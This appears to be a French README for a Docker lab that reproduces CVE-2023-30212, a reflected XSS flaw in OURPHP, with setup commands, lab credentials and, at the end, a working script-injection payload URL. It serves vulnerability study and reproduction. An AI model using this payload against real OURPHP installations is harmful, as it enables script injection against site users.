
Ceci contient les fichiers nécessaires et Docker pour reproduire une vulnérabilité dans OURPHP qui comporte une vulnérabilité XSS (CVE-2023-30212)
Ceci contient les répertoires nécessaires et le Dockerfile pour reproduire une vulnérabilité dans OURPHP qui a une vulnérabilité XSS (CVE-2023-30212).
PRÉ-REQUIS
Télécharger Docker
sudo apt install -y docker.io
Téléchargez les fichiers de ce dépôt en utilisant git clone
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git .
Ceci contient les répertoires nécessaires et le dockerfile pour reproduire le scénario.
Après avoir téléchargé les fichiers, construisez une image docker en utilisant
sudo docker build -t <Give_Suitable_Docker_name> . .
! Ajoutez un nom à l'image Docker pour pouvoir l'appeler plus tard.
Convertissez l'image Docker en conteneur en utilisant
sudo docker run -d -p 80:80 <Docker_Image_Name> .
! Ici, le port du conteneur est mappé au port 80.
Pour voir le statut du conteneur docker ,
sudo docker ps
Après avoir effectué ces étapes,
Entrez localhost et configurez OURPHP avec les identifiants suivants. Nom d'utilisateur : root Mot de passe : root Nom de la base de données : data
Vous devez maintenant configurer le nom d'utilisateur et le mot de passe pour l'administration. Définissez les éléments suivants : Nom d'utilisateur : root Mot de passe : root et continuez
Donc notre payload est
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
ajoutez ceci avec localhost ou 127.0.0.1 pour déclencher XSS.